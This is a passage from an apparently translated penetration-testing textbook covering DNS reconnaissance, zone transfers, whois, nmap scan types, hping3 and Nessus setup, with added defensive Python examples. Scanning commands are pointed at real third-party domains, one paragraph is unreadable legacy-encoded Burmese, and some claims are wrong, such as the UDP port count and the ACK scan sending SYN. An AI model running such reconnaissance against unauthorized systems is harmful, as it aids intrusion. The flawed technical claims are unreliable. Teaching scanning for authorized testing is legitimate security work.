Then, to find out the IP address of the target web page, type in the domain of the target web page. I will use www.google.com as the example.

You will see that two kinds of answer are shown, authoritative and non-authoritative. A non-authoritative answer can point to information from the servers' caches, so it can be called a very good information source. Without exiting yet, let's look up some more.
>set type=MX
>google.com
Now you can see the mail servers for Google.com.

After setting set type=ns and typing Google.com again, you can now see Google's name servers (ns).

Zone Transfer
Just as a program like nslookup can be used to collect a good deal of information, a zone transfer can also be used to collect a good deal of information. The form of the command is dig @[name server] [domain] axfr.

In place of [name server] you can enter a name server from the result found with nslookup. The [domain] is already known, so if you look at the picture above you can see the example shown.
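For the owner of a domain, the same dig command is a quick audit of their own name servers: the expected answer is a refusal, and a full listing means the zone is readable by anyone. The following added example (not from the book) classifies captured dig output and lists the names that would be exposed; both captures are constructed, example.com and every address in them are placeholders, and the function name is an assumption.

```python
import ipaddress
from collections import Counter

# RFC 1918 private ranges, used to spot internal hosts leaking from the zone.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed capture: a name server that refuses the transfer (desired state).
REFUSED = """\
; <<>> DiG 9.18.1 <<>> @ns1.example.com example.com axfr
; (1 server found)
;; global options: +cmd
; Transfer failed.
"""

# Constructed capture: a name server that hands the whole zone to anyone.
EXPOSED = """\
; <<>> DiG 9.18.1 <<>> @ns1.example.com example.com axfr
; (1 server found)
;; global options: +cmd
example.com.          3600 IN SOA ns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600
example.com.          3600 IN NS  ns1.example.com.
example.com.          3600 IN MX  10 mail.example.com.
www.example.com.      3600 IN A   192.0.2.10
mail.example.com.     3600 IN A   192.0.2.25
intranet.example.com. 3600 IN A   10.0.5.20
backup.example.com.   3600 IN A   192.168.1.40
example.com.          3600 IN SOA ns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600
;; XFR size: 8 records (messages 1, bytes 312)
"""


def is_rfc1918(address):
    """True when the string is an IPv4 address inside a private range."""
    try:
        ip = ipaddress.ip_address(address.strip())
    except ValueError:
        return False
    return any(ip in net for net in RFC1918)


def audit_axfr(dig_output):
    """Summarise what one `dig @ns domain axfr` capture reveals."""
    records, failed = [], False
    for line in dig_output.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith(";"):  # dig comments and status lines
            if "transfer failed" in line.lower():
                failed = True
            continue
        parts = line.split(None, 4)  # name, ttl, class, type, rdata
        if len(parts) == 5 and parts[2] == "IN":
            records.append((parts[0].rstrip(".").lower(), parts[3], parts[4]))

    # A complete zone transfer begins and ends with the zone's SOA record.
    complete = (len(records) >= 2
                and records[0][1] == "SOA" and records[-1][1] == "SOA")
    zone = records[:-1] if complete else records
    internal = sorted(name for name, rtype, rdata in zone
                      if rtype == "A" and is_rfc1918(rdata))
    allowed = complete and not failed
    return {
        "transfer_allowed": allowed,
        "record_types": dict(Counter(rtype for _, rtype, _ in zone)),
        "internal_hosts": internal,
        "finding": ("zone readable by anyone: restrict transfers to secondaries"
                    if allowed else "transfer refused"),
    }


if __name__ == "__main__":
    for label, capture in (("refused", REFUSED), ("exposed", EXPOSED)):
        print(label, audit_axfr(capture))
```

On BIND, the setting that limits who may request a transfer is the allow-transfer option.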
Information Gathering Tools in Kali Linux

Kali Linux has many built-in tools for information gathering. There are ten tool groups: DNS Analysis, IDS/IPS Identification, Live Host Identification, Network & Port Scanner, OSINT Analysis, Route Analysis, SMB Analysis, SMTP Analysis, SNMP Analysis and SSL Analysis. Each group contains further tools, so under 01-Information Gathering you will find a great many tools. Later on I will present them where appropriate, section by section.

Seven Steps of Information Gathering


As discussed earlier, reconnaissance means the sum of all the activities involved in information gathering. Information gathering can be active, and it can be passive. A hacker may also try to gather information using both, active and passive. Including searching in places such as public websites, information gathering can mainly be divided into 7 steps.

When the three stages, active footprinting, passive footprinting and enumeration, are broken down further, we get the seven steps of information gathering shown above. These are the seven steps, but I do not at all mean that they must be done in exactly this order. Detailed articles on each step will continue to be published at www.khitminnyo.com. Presenting those steps in this book would use up many pages, so I won't explain them one by one.
It is just as we discussed earlier. When an attacker collects information, both active and passive footprinting can be used. Fine, so where do we start? The best start is to visit the target company's website. You come to understand the target organization. You can learn the target organization's key people, contact details (name, mail, phone, etc.), the target company's potential customers, its business area, the technology it uses and so on. Because this is taken from a publicly posted website, it is a legitimate way of obtaining information.
xdkodkY target udk wdkuf&dkuf xdawGYjcif;r&Sdao;bJ information
&,ljcif;rsdK;udk Passive Footprinting vdkY tMurf;zsif; rSwf,lEdkifygw,f/ tJonfrSm
odvmr,fh contact phone udk qufjyD; jzpfap? mail uaejzpfap? Social Media
awGuaejzpfap information awG ydk&zdkYtwGuf BudK;pm;jcif;uawmh Active
footprinting xJrSm yg0ifygw,f/
WHOIS
There is one more tool that can help us when collecting information about a website: WHOIS. It can be used easily from the Kali Linux terminal. I will look up www.bible-history.com as an example. When searching, do not include the www. prefix.

It works just as in the example search shown. When you enter and look up your target domain, you will obtain very valuable details. Besides what can be seen in the picture above, you will also see the parts that are not included in the picture.

If you want to look up the above result from another device (e.g. a phone), you can type sg.godaddy.com/whois in the browser and search there.

Enter the target domain in the search box that appears and search, and you are done.

Let's continue. In the Kali terminal, in the same place where we just looked up the target domain, you can also use the form host target. I will continue the example with bible-history.com.

You can see who is handling mail for the current target. If you want to know the target's name servers, you need to search in the form host -t ns target-domain. For example:

Searching as above will return the target's name server, and you can continue investigating in the form host -l target-domain ns to obtain the target IP.

Look at the picture above. To make it clearer, the ns that was taken and entered is shown. The IP has now been obtained. To investigate further and get detailed information about the IP obtained, you can use whois IP.

To really explain reconnaissance, footprinting and information gathering in full would take close to 200 pages. For this book I consider this much to be quite sufficient, so let's pause here for now. We will meet the readers again in the next chapter. :)
CHAPTER 9: Scanning

Introduction

I think you will remember that in Chapter 6, out of the steps hackers usually carry out, we discussed 5 steps for ethical hackers. The first step, reconnaissance, was already discussed in Chapter 7, so we will continue with the second step, scanning. Once sufficient information has been obtained with active and passive footprinting methods in the first phase, reconnaissance, the second phase to carry out is scanning.

Scanning can mainly be viewed as two parts: network scanning and port scanning. You will understand it better as we go along.

The situation in the scanning phase can differ depending on how well the information gathering was done. In other words, if the information was collected completely in the previous stage, this stage will be easier.
The main focus of the scanning phase is to find and extract specific information about the computers and devices connected to the target organization's network. In this phase the main focus is on finding the live hosts among the systems inside the target organization's network, classifying their types (e.g. desktop, laptop, server, network device, or mobile computing devices, etc.), which operating system they use, what public services they offer (e.g. web applications, SMTP, FTP, etc.), what vulnerabilities may exist, and so on.

Tools such as Nessus, Nmap and Hping can be used to carry out such scanning. The aim of this stage is to have a list of possible targets prepared before attacking in the next stage.

Definition (Vocabulary)
Here I have collected some things I want to present in advance about some of the terms that will appear in this chapter. This is to make things easier for those who do not know them yet. Let's first look at them one by one.
Network Traffic
The electronic communication between computer systems that are connected to each other in various ways can be defined as network traffic.

Firewalls
Widely known as something used to protect a network system, the original meaning of firewall is a fire-resistant wall, a wall that blocks fire. In the computing field, a firewall acts as a gatekeeper for the network. As a gatekeeper, it watches what comes in and what goes out. It allows through only the traffic that matches the criteria set by access control, and blocks whatever does not match. For this reason a firewall can open and close ports in order to inspect inbound traffic (ingress) and outbound traffic (egress) and accept or reject it.

Ports
Ports are the communication channels used for computer to computer communication. There are 65,535 TCP ports that can be used for communication, and the number of UDP ports is 63,535 ports. Although there are a great many ports, only a small number of ports are designated for specific functions. Even so, they are not restricted to that use alone. For example, TCP port 80 is usually used for normal web traffic with HTTP (Hyper Text Transfer Protocol), but other traffic can also pass through port 80.
To understand ports better, imagine a large office building with many rooms. Every room has doors, and in every room there are staff who perform different functions. Suppose that in this office suite 80 handles everything related to the web. Then suppose suite 80 moves to another office, or its duties change. It will have to hand its original work over to another department. Suppose it hands over to suite 8080. From then on 8080 takes charge of the web-related work it took over.

In this situation, people who come to 80 will only find a closed room or an unused room, and if they investigate the web-related matter further they will learn that it is available at 8080 and can no longer be had at 80. So those who have the correct address, 8080, will have their web request arrive correctly, while those who know only 80 may lose time and run into difficulties because of the wrong contact. This is just an example to help you picture it.

IP Protocols
Protocols represent rules, both in the computing field and in real life. Ambassadors, politicians and high-level offices often appoint special staff to handle protocol issues. Whether messages can be delivered and received properly, and whether the things that must be known according to rank are correct, are supervised by those staff appointed for protocol issues. It is the same in the computing field. Things have to happen according to the rules defined in advance between systems.

TCP
TCP is one of the main protocols used for network communication. Because it is a connection-based communication protocol, it is used to open communication sessions between the computers at each end of the communication channel and to send and receive data.
Let's continue with the example of a phone call. Suppose a phone rings.

Mg Mg: "hello"
Caller: "Hi, is Ko Maung Maung there? I would like to speak with Ko Maung Maung."
Mg Mg: "This is Maung Maung speaking."

If you look at the phone call example above, you will see that it resembles TCP's three-way handshake. In TCP communication, when one computer connects to another, three packet exchanges take place at the very start of the communication.

First, PC-A sends SYN packets to PC-B to announce that it wants to establish a reliable connection. PC-B then sends a response back to PC-A that includes both an acknowledgment and a synchronization (SYN/ACK). The purpose of the acknowledgment is to report that the SYN packet sent by the source was received, and that the destination accepts the SYN flag in order to establish the connection. That TCP packet is referred to as SYN/ACK. Third, when PC-A receives the SYN/ACK, it sets the ACK flag in the TCP header and sends an ACK packet in reply; after that a connection has been established and communication can begin.

UDP
UDP is a kind of connection protocol that is not reliable the way TCP is. I will not go into the details.

ICMP & Ping


I will not split these two into separate headings. ICMP is used so that two TCP/IP devices can send each other whether they can connect properly, whether there are errors, and control information. ICMP messages carry a specific type and code (a set of numbers) in their header. Because they provide information about the various nodes on the network, those types and codes help pen-testers estimate which systems are running on the target system.
Fig: ICMP table
There is an application that uses the ICMP messages echo, echo request, destination unreachable and some other messages. That application is ping. Ping can be used to check whether a destination is available. If the destination is available, it will answer with an echo reply packet, and if an intermediate router cannot get through to the destination, it will answer with a destination unreachable message. If the router does reach the destination but no echo packet is returned, you will only see a request timed out message.

The picture above shows Ping 192.168.1.1 as an example. When you ping from Windows cmd it finishes and stops by itself, but if you ping from a Linux terminal it keeps running until you press control + c.

Try an example yourself.
Traceroute
Traceroute is a tool that lists the IP addresses of the routers along the path to a destination. Traceroute uses ICMP's ping command. The traceroute command used on Windows is tracert.

This is an example shown in Windows cmd.

In the Linux terminal you will find that it is faster. Many of the scanning tools included in Kali Linux use protocols such as TCP, UDP and ICMP to map out target networks. The successful results of the scanning phase are details such as a listing of hosts, IP addresses, operating systems and services. Some tools can even uncover vulnerabilities and user details.

Those details can create good opportunities for the exploitation phase. This is because the attacks to be carried out in the exploitation phase differ depending on the target's hosts, technologies and vulnerabilities.
NMAP (the King of Scanners)
Nmap can not only identify the active computers running on a target network, it can also identify the operating system and determine listening ports, services and possible user credentials, which is why it is praised as the King of Scanners. Through its commands, switches and options it is also a tool that can help enormously in the scanning phase.

Nmap Command Structure


The Nmap command structure can be roughly presented as follows.

The Nmap command structure is easiest to picture with the form above. The first part used is the command nmap. The meaning of the command is to tell the computer which program you are going to use. The second part is the options. Since nmap is a scanning tool, its options are scanning options. The one used there is -sS, with one lowercase and one uppercase s. It stands for -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans, and it says that, out of nmap's scanning techniques, the stealth scan will be used. Third, -T2 is the timing option. You can choose from 0 to 5 to go faster or slower; higher is faster. The IP address that is entered selects the target. The last option is the output. -oN means output the scan in normal format; put simply, the result is written to a file. The scan.xml after it means the result is written out as an xml file named scan. You can give it whatever name you like. You can also choose the location. For example, if you want the result written to the Desktop, put Desktop/scan.xml in place of scan.xml.

You can scan without a timing option, and you can also scan without setting an output.

The open ports can also be found easily in the result.

You can also scan websites directly instead of an IP address.

If nmap is used with its defaults, it scans as a stealth scan. If you want to see the options and how they are used, you can, as usual, look at the manual (#man nmap) and the help option (#nmap -h <or> nmap --help).
-sS Stealth Scan
It has already been stated that the stealth scan, -sS, is nmap's default scan option. It can begin a TCP connection with the target, but it does not carry the three-way handshake through to completion.

69.171.239.12 is the IP address of facebook.com's name server, looked up with nslookup. We already discussed this in the information gathering part. Looking at the result in the picture above, you can see that TCP port 53 is in the open state and that the service is domain.
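Because a SYN scan never sends the final ACK of the three-way handshake, a defender can spot it by looking for a source that leaves many handshakes unfinished across different ports. The following is an added example, not code from this book; the packet tuple format, the addresses and the threshold of 5 ports are constructed assumptions.

```python
from collections import defaultdict


def handshake_states(packets):
    """Track each attempted TCP connection through the three-way handshake.

    packets: iterable of (src_ip, src_port, dst_ip, dst_port, flags),
    where flags is a string such as "SYN", "SYN/ACK", "ACK" or "RST/ACK".
    Returns {(client, client_port, server, server_port): state}.
    """
    state = {}
    for src, sport, dst, dport, flags in packets:
        seen = set(flags.split("/"))
        fwd = (src, sport, dst, dport)   # key if the sender is the client
        rev = (dst, dport, src, sport)   # key if the sender is the server
        if seen == {"SYN"}:
            state[fwd] = "syn_sent"
        elif seen == {"SYN", "ACK"} and state.get(rev) == "syn_sent":
            state[rev] = "syn_ack_received"
        elif "RST" in seen and state.get(rev) == "syn_sent":
            state[rev] = "refused"            # server reset: port closed
        elif "RST" in seen and state.get(fwd) == "syn_ack_received":
            state[fwd] = "half_open_reset"    # client reset instead of ACK
        elif seen == {"ACK"} and state.get(fwd) == "syn_ack_received":
            state[fwd] = "established"        # handshake completed
    return state


def suspected_syn_scanners(packets, min_ports=5):
    """Sources that tried >= min_ports services and never completed a handshake."""
    per_source = defaultdict(lambda: {"unfinished": set(), "established": 0})
    for (client, _cport, server, sport), st in handshake_states(packets).items():
        if st == "established":
            per_source[client]["established"] += 1
        else:
            per_source[client]["unfinished"].add((server, sport))
    return sorted(
        client for client, e in per_source.items()
        if len(e["unfinished"]) >= min_ports and e["established"] == 0
    )


def ports_answered_then_reset(packets, client):
    """Ports that answered SYN/ACK to `client` and were then reset by it."""
    return sorted(
        sport for (c, _cp, _srv, sport), st in handshake_states(packets).items()
        if c == client and st == "half_open_reset"
    )


def _probe(client, cport, server, port, is_open):
    """Build the packets one half-open probe produces (constructed data)."""
    pkts = [(client, cport, server, port, "SYN")]
    if is_open:
        pkts += [(server, port, client, cport, "SYN/ACK"),
                 (client, cport, server, port, "RST")]
    else:
        pkts.append((server, port, client, cport, "RST/ACK"))
    return pkts


# Constructed sample traffic: one source probing six ports, one normal client.
SAMPLE = []
for i, (port, is_open) in enumerate(
        [(21, False), (22, True), (23, False), (25, False), (80, True), (443, False)]):
    SAMPLE += _probe("192.0.2.50", 40000 + i, "192.0.2.10", port, is_open)
SAMPLE += [
    ("192.0.2.77", 51000, "192.0.2.10", 80, "SYN"),
    ("192.0.2.10", 80, "192.0.2.77", 51000, "SYN/ACK"),
    ("192.0.2.77", 51000, "192.0.2.10", 80, "ACK"),
]

if __name__ == "__main__":
    print("suspected scanners:", suspected_syn_scanners(SAMPLE))
    print("ports reset after SYN/ACK:", ports_answered_then_reset(SAMPLE, "192.0.2.50"))
```

The normal client is not flagged because its handshake reaches the established state, while the probing source only ever produces refused or reset attempts.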

-sT TCP Connect Scan


The TCP connect scan lets you scan the TCP connection with the target host more completely than the stealth scan does.
-sU UDP scan
The UDP scan evaluates the UDP ports on the target system. What makes it different from a TCP port scan is that a UDP scan can manage to receive a reply even from a target system that is closed.

This is an example lookup against the IP address of a website. Two UDP ports are found, and you can see that they are closed.

This shows a UDP scan carried out against another IP address.

-sA ACK scan


The ACK scan, used with -sA, is used when a TCP port is filtered or unfiltered. Because it uses ACK to initiate with the target, it can even bypass some firewalls. It sends SYN packets to the target. If a reset (RST) response comes back from the target, the scan shows that the port is unfiltered. If no response comes back, or if an ICMP response (unreachable error) with code 1, 2, 3, 9, 10 or 13 comes back, you can tell that the port is filtered. See the picture below.
Timing Templates
The timing function can be used to make a scan faster (or slower) than normal scanning. Nmap's default timing is T3 (normal).

-T5 was used in the example. The IP address used is the IP address of Metasploitable.

You can also select the ports to scan.

-p 1-500 means that only ports 1 through 500 will be scanned. I would like you to try it yourselves to see what the results look like.

T0 to T5 (summary)
T0 is called paranoid. It is more effective, but it takes an extremely long time, so it can be used when stealth is needed or when you have plenty of time.

It can be used as -T0 or --timing paranoid. Both are shown as examples above. Try them. Watch for the differences and note them down. You will see the differences more and more clearly. It does take time, and you will need to be patient.

T1 is called sneaky. It is faster than T0. It is used simply with -T1.

Next comes T2. It is faster than T1. T2 is called polite.

T3 is the default, so you do not need to type T3 at all. The name of T3 is normal.

T4 is aggressive and is faster still. T5 is the fastest and is called insane. Use T0, T1, T2, T3, T4 and T5 one at a time and try all 6 in practice against one target. Note the differences, so that later you will remember which one to use for which need.

Targeting for Nmap


For Nmap, the target can be an IP address or a website. Here we mean an IP address target. First we will discuss scanning IP address ranges. Before that, I want to say a little about IP address classes. You will already have heard about IP address classes, so I will not go through each one separately here.

If you look at the table that sets out the IP classes, it is easy to see. For example, suppose our target IP is 192.168.165.128. Looking at the table above, you will find that 192.168 falls in class C. Looking at the end of the last column, it is 255, so the target IP range can be from 192.168.165.0 to 192.168.165.255. Let's try it in practice. In place of the IP address, work out and enter your own IP address. Let's start.

A great many results will come out. I would like you to try it yourselves. CIDR addressing can also be used to produce the same answer.

You only need to add /24. Note that no timing option is included here. Do not forget to watch for and note the differences in the answers.

If you want to set the range more narrowly, you can use the form below.
Scan List
When scanning with Nmap, you can also put the target IP addresses in a list and have it scan them. The IP list has to be created as a txt file.

As the listing made with ls in the picture shows, there is an IP list on my Desktop in which IP addresses have been collected. It is a file called IP-list.txt.

Here the IP-list.txt file containing the IP addresses is shown opened in gedit. Let's scan it with the nmap command.

The command is simple. -iL (insert List) indicates that a list file is to be used. The file name after it can be whatever you like, for example targets.txt. Build a small IP list of your own and try it.

Selecting Ports
We have already discussed selecting the ports to scan, so I will not go over it at length here. It can be used in forms like the following.

-p 1-100 scans ports 1 through 100. -p 1,21,... and so on (the second picture) scans only the ports that are selected. The last one, -p 1-100,137,161,162, means that in addition to ports 1 through 100, ports 137, 161 and 162 from above 100 are scanned as well. You can pick whichever of these three forms you need. The numbers are purely examples.
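Before a target list and a port selection like the ones above are handed to a scanner, it is worth checking that every address falls inside the range you are authorized to test and seeing how many probes the job amounts to. The following is an added example, not code from this book; the list contents, the authorized range and the function names are constructed assumptions, and only single IPs, CIDR blocks and last-octet ranges are handled.

```python
import ipaddress


def parse_ports(spec):
    """Expand a port selection such as '1-100,137,161,162' into a sorted list."""
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
        else:
            lo = hi = int(part)
        if not 0 <= lo <= hi <= 65535:
            raise ValueError(f"bad port range: {part!r}")
        ports.update(range(lo, hi + 1))
    return sorted(ports)


def expand_target(entry):
    """Expand one list entry: a single IP, a CIDR block, or a last-octet range."""
    entry = entry.strip()
    if "/" in entry:
        # strict=False accepts a host address with a mask, e.g. .128/24
        return list(ipaddress.ip_network(entry, strict=False))
    head, _, last = entry.rpartition(".")
    if "-" in last:
        lo, hi = (int(x) for x in last.split("-", 1))
        if not 0 <= lo <= hi <= 255:
            raise ValueError(f"bad address range: {entry!r}")
        return [ipaddress.ip_address(f"{head}.{n}") for n in range(lo, hi + 1)]
    return [ipaddress.ip_address(entry)]


def check_scope(list_text, authorized_cidr, port_spec):
    """Split a target list into in-scope and out-of-scope addresses."""
    allowed = ipaddress.ip_network(authorized_cidr)
    in_scope, out_of_scope = {}, {}
    for line in list_text.splitlines():
        line = line.split("#", 1)[0].strip()   # allow comments and blank lines
        if not line:
            continue
        for addr in expand_target(line):
            bucket = in_scope if addr in allowed else out_of_scope
            bucket[str(addr)] = True            # dict keeps order, removes repeats
    ports = parse_ports(port_spec)
    return {
        "in_scope": list(in_scope),
        "out_of_scope": list(out_of_scope),
        "probes": len(in_scope) * len(ports),
    }


# Constructed contents for a list file such as IP-list.txt.
SAMPLE_LIST = """\
# lab hosts
192.168.165.128
192.168.165.10-12
192.168.166.5
"""

if __name__ == "__main__":
    report = check_scope(SAMPLE_LIST, "192.168.165.0/24", "1-100,137,161,162")
    print(report)
```

An entry that lands in out_of_scope is a reason to stop and correct the list before any scan is started.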

Output Options
The output option was already mentioned briefly earlier. Now let's go through the four options one at a time. First, -oN is the normal output. The result can be saved as an output file so that it can be reused in other programs. For example, say we save it under the name test.

-oX is the Extensible Markup Language (xml) output.

-oG is the GREPable output, which penetration testers use so that they can investigate further with tools such as GREP.

-oS is the ScRipT KIdd|3 oUTpuT. This script kiddie output should not be used in serious scans.
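The grepable format written by -oG puts each host on one line, which makes it easy to compare a scan of your own network against the services you expect to be exposed. The following is an added example, not code from this book; the sample report lines and the expected-services table are constructed, and the parser assumes there are no commas inside a port entry.

```python
def parse_grepable(text):
    """Parse 'Host: ... Ports: ...' lines from grepable (-oG) output.

    Each port entry has the form
    port/state/protocol/owner/service/rpcinfo/version/
    and entries are separated by commas; fields on a line by tabs.
    Returns {ip: [ {port, state, proto, service}, ... ]}.
    """
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue                      # skip '#' comment lines
        fields = line.split("\t")
        ip = fields[0].split()[1]
        for field in fields[1:]:
            if not field.startswith("Ports: "):
                continue                  # e.g. 'Status: Up', 'Ignored State: ...'
            for entry in field[len("Ports: "):].split(","):
                parts = entry.strip().split("/")
                if len(parts) < 5:
                    continue
                port, state, proto, _owner, service = parts[:5]
                hosts.setdefault(ip, []).append({
                    "port": int(port),
                    "state": state,
                    "proto": proto,
                    "service": service,
                })
    return hosts


def unexpected_open(hosts, expected):
    """List open ports that are not in the expected {ip: {(port, proto)}} table."""
    findings = []
    for ip, ports in sorted(hosts.items()):
        allowed = expected.get(ip, set())
        for p in ports:
            if p["state"] == "open" and (p["port"], p["proto"]) not in allowed:
                findings.append((ip, p["port"], p["proto"], p["service"]))
    return findings


# Constructed sample of grepable output (tabs separate the fields).
SAMPLE_OG = "\n".join([
    "# Nmap scan in grepable format (constructed sample)",
    "Host: 192.0.2.10 ()\tStatus: Up",
    "Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, "
    "443/closed/tcp//https///\tIgnored State: filtered (997)",
    "Host: 192.0.2.11 ()\tStatus: Up",
    "Host: 192.0.2.11 ()\tPorts: 23/open/tcp//telnet///, "
    "161/open|filtered/udp//snmp///",
])

# Constructed baseline: what each host is supposed to expose.
EXPECTED = {
    "192.0.2.10": {(22, "tcp"), (80, "tcp")},
    "192.0.2.11": set(),
}

if __name__ == "__main__":
    for finding in unexpected_open(parse_grepable(SAMPLE_OG), EXPECTED):
        print("unexpected open port:", finding)
```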

HPING3
Hping is an application used to put manually crafted packets onto the network. This manual process is similar to the way the nmap engine creates packets automatically. Hping3 is usually used together with the -S flag.

You can try it yourselves. To stop it, either close the terminal or press control+c.
Nessus
Now let's go on to discuss the Nessus scanner.

As in the picture above, the Nessus scanner is released in three versions, and the Pro and Manager versions have to be called very expensive. They cost over two thousand dollars a year, so ordinary users have to rely on the free version. (You do not have to follow along with this part.)

If you want to download the Nessus scanner, you can type bit.ly/nessus-kmn in the browser's address bar and press enter.

Following the address above takes you to the place where you choose a download for the Nessus scanner, and you can choose from Windows, Mac OS, Linux, FreeBSD and GPG Keys. I am going to use Kali Linux, so I chose Linux. Readers can also get the one for Windows.

I am going to demonstrate on Kali Linux, so I will not talk about the others. Look at the picture above. As soon as you select and click Linux, it appears as in the picture above and you will find choices for the kind of Linux you are going to use. At the top you will see Kali Linux AMD64 and in the second position i386 (32-bit). You can download the one that matches your OS. I will demonstrate with 64-bit Kali Linux.

To make it easy to find, I moved the downloaded Nessus file onto the Desktop. After entering the Desktop with cd Desktop and listing it with ls, you will see in the terminal a Debian package, shown in red, called Nessus-6.11.1-debian6_amd64.deb. How to install Debian packages was already explained back in the Linux chapter. I will explain it once more here.

It is a Debian package, so we use dpkg. The install option is -i, and the Nessus-6.11.1-debian6_amd64.deb after it is the package name. You can copy and paste the package name so that you do not get it wrong (it must be entered exactly as the name of the file you downloaded). Then press enter. When another command line appears, the install has finished.

In the terminal, type /etc/init.d/nessusd start and press enter, and you will see Starting Nessus : . as in the picture above. Go to the browser. Then type https://localhost:8834 in the browser's address bar and press enter.

When you enter the address as above, you will see the following. Go to the place labelled Advanced.

Then click Add Exception..

Then press confirm security exception.

You will arrive at the Nessus Welcome screen as in the picture above. Choose continue. Enter a user name and password that suit you and go on.

When you reach the stage above, you can go and register from the Registering the scanner link. You will see it as a small green link. Follow it. Then register either at tenable.io free for 60 days or at Free. A mail will arrive for you, and you will find the code after the words your activation code for the Nessus Home is. Copy it and enter it.

After that, setup is complete and you will see that it is installing. Because it is downloading, an internet connection is still needed. Let me mention something I forgot to say: the hardware needed to use Nessus. What is listed as needed in order to use Nessus is the minimum requirement. If you are going to operate specifically as a security business, the requirements may be higher. If you want to know the software and hardware needed in detail, you can go and look at bit.ly/nessus-req.

Only the browsers above support Nessus, so the browser matters a great deal too.

When the install has finished after quite a long time, you can log in using the username and password from earlier. After you sign in, you will find My scans, All scans, Plug in rules and Scanners to choose from. You will also see a line that says create new scan. You can now start scanning.

If you look at the scanners, you can tell apart the ones available in the free version and the ones available only in the upgraded versions. Let's start with the first one, Advanced Scan.

Fill in Settings as appropriate, fill in the Plugins, and save, and a scan configuration has been prepared.

If you press the > symbol at the far right and launch it, you will see it start scanning what you selected. The scan takes time depending on your targets.

When scanning has finished, the results are displayed like this for each IP. What is shown as Vulnerabilities next to Hosts are the weaknesses (holes) that are present in the current system. If you click Vulnerabilities and go in, you will see more detail. The items shown in green and blue are nothing to worry about, but the yellow, orange and red ones are not good. Red is the worst and orange is the second worst. Yellow has to be called the mild one among the bad ones.

I believe you will understand it better if you try it yourselves. By clicking each vulnerability open, you will see recommendations describing what kind of vulnerability it is, what should be done about it, and so on.

From Export at the far right you can also save and keep the results as pdf, nessus, html, csv or nessus DB files. This chapter is a discussion of the scanning phase, and the hands-on tasks have now been presented as well.

In this chapter I tried discussing things in a different form. Because what has to be done has been explained step by step, I believe you now know and understand it reasonably well. In this chapter I wanted to discuss things in a form that is the reverse of the usual one, so the parts that would normally be discussed first are the ones I am going to discuss now. Please carry out the discussion above first. Only when you have finished would I like you to read on into the part that follows.

Types of Scanning
We already know that phase 2 of hacking is scanning. In the hands-on work there was something we could have noticed: the words network and port. We say that we scan. If someone asks what we scan, there are two distinct answers. Those are the types of scanning. Scanning can be viewed as two forms, network scanning and port scanning. I will present each of them in turn.

Suppose a hacker is trying to break into a network system. Without basic details such as which systems and services are running inside the private network, the IP addresses, and the operating systems in use, no information of any kind can be hacked.

This is where the role of scanning becomes important. Depending on what is scanned it can be classified as network scanning or port scanning, but both are equally important parts.

Network Scanning
Of the two kinds of scanning, network scanning and port scanning, the first is network scanning. Although it is broadly called network scanning, in most cases only private network scanning is carried out. Most techniques were created for scanning internally, and only a few can also scan public networks and obtain a reliable result.

Fine. Then how do hackers scan our internal networks? They use those few tools and scan our public IP addresses. Then they look for weaknesses that will let them get past our defenses.

Scanning methods were also discussed above. Now let's add to that with a scanning tool that has not been discussed above yet. The tool is Angry IP Scanner, which uses ICMP. You can download it by typing angryip.org/download in the browser. It can be used on Linux, Mac and Windows. When you go there from that address there are three choices, Windows, Mac and Linux; I am going to use Kali Linux, so I chose Linux.

When you make the selection you will see what is in the picture above. I am going to use Kali Linux, and Kali is Debian based, so the choice has to be made from DEB Package. You can choose and download 32 or 64 bit according to your OS. Suppose you now have it. The file I downloaded is ipscan_3.5.1_amd64.deb, so it has to be installed with dpkg -i ipscan_3.5.1_amd64.deb. I assume you already know how to install, so I have not included pictures. If you open it, you will see what is in the picture above.

As an example, an ordinary scan is shown. When the IP addresses from 172.16.3.1 to 172.16.3.100 were scanned, it reported Hosts alive 1, showing that there is one host that is alive.

If you go into the result (lists) that was produced and open it, you will see it as above. If you try it yourselves you will see the differences more clearly.

The picture above shows a scan of the IP address of a website. When the Hostname was copied and visited through the browser, it led to the Login Page shown below.

I will not reveal which site it is.


Port Scanning
If you are asked whether you know which protocol most network services and programs use, the answer is TCP/IP. The TCP/IP network protocol was started by the US Department of Defense in 1970. As of 2017 it has been around for about 47 years. Although further technologies have emerged since then, most people still go on using it today.

Services listen through ports. A client can contact a service and establish a connection. The purpose is to be able to transfer information and to request services.

When the ports running on a server are scanned, the ports send back a response. This indicates that the port is open and that a service can be listening on it.

Ports are a software abstraction and are used to distinguish between communication channels. Ports identify the specific applications in use on a single machine. So you can note that port scanning refers to the actions carried out to test remotely in order to learn the current status of ports.
That was only a brief discussion. We have IP addresses and we have ports. Let's discuss how they can be used.

IP addresses can be used to find the machines that are on a network. To find the particular applications on each single machine, ports have to be used. Let's discuss an example with a couple of well-known ports.

When HTTP URLs are used, our browser connects to TCP port 80 by default. If the HTTPS protocol is used, the browser will try to connect to port 443 by default. Explaining this part in detail could run to about half a book, so let me stop here.
Zenmap (The GUI Version of Nmap)
Zenmap is an application created so that nmap can be used as a GUI version instead of from the command line. It works the same way as nmap. Only the appearance is different, and Zenmap can be used on Windows as well. It can be downloaded from nmap.org/download.html.

For Windows, the latest upgraded version .exe can be downloaded from the link in the picture above. The version may differ. The one shown is the version that was available as of October 8, 2017.

In the Kali Linux that we use, Zenmap is already included (built in). There is no need to download it.

When you open Zenmap you will see it as above. In the Target field you can enter an IP address (in any range), and in the field called command below it you can also enter nmap terminal commands. Above, there is also a Profile that you can choose yourself, and from there you can select and set the scan type.

Below the command you will find two more options, Hosts and Services, and for the results you will see Nmap Output, Ports/Hosts, Topology, Host Details and Scans. Nmap has already been explained, so trying it in practice will help you know and understand it better. For my part, I would rather you used Nmap.

The picture above shows the scan types that can be selected in Zenmap's Profile. By trying each one and comparing it with the nmap commands, you will come to understand more by yourselves and will also learn which one is better to use.

Let's go on to another chapter.
CHAPTER 10: Exploitation

Introduction to Exploitation

